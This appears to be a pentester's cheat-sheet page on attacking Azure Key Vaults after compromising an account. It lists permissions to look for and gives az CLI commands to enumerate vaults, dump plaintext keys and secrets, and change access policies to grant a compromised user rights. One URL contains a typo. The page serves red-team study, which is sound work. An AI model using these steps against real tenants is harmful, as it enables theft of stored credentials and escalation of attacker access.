Skip to main content

Attacking Key Vaults

While owning users and devices in AAD environments, it's good practice to look out for permissions like

Microsoft.KeyVault/vaults/read                    # read keys in a vault
Microsoft.KeyVault/vaults/secrets/read            # read the plaintext passwords in a vault
Microsoft.KeyVault/vaults/accessPolicies/write    # change access policies of vaults

To list the key vaults we have access to we use

PS /home/otter> az keyvault list

If we have the right permissions we can also list the keys and secrets stored in the vaults:

  • keys are usually stored at https://<keyvault_name>.vault.azure.net/keys/<key_name>
# list keys
PS /home/otter> az keyvault key list --vault-name <vault_name>
# show plaintext keys
PS /home/otter> az keyvault key show --vault-name <vault_name> -n <key_name>
  • secrets are usually stored at https://<keyvault_name>.vault.azure.ner/secrets/<secret_name>
# list secrets
PS /home/otter> az keyvault secret list --vault-name <vault_name>
# show plaintext secrets
PS /home/otter> az keyvault secret show --vault-name <vault_name> -n <secret_name> --query value -o tsv

If we compromised a user that can change the access policy for a vault we can delegate permissions to other users

PS /home/otter> az keyvault set-policy -n <vault_name> --key-permission get list --upn otter@minions.onmicrosoft.com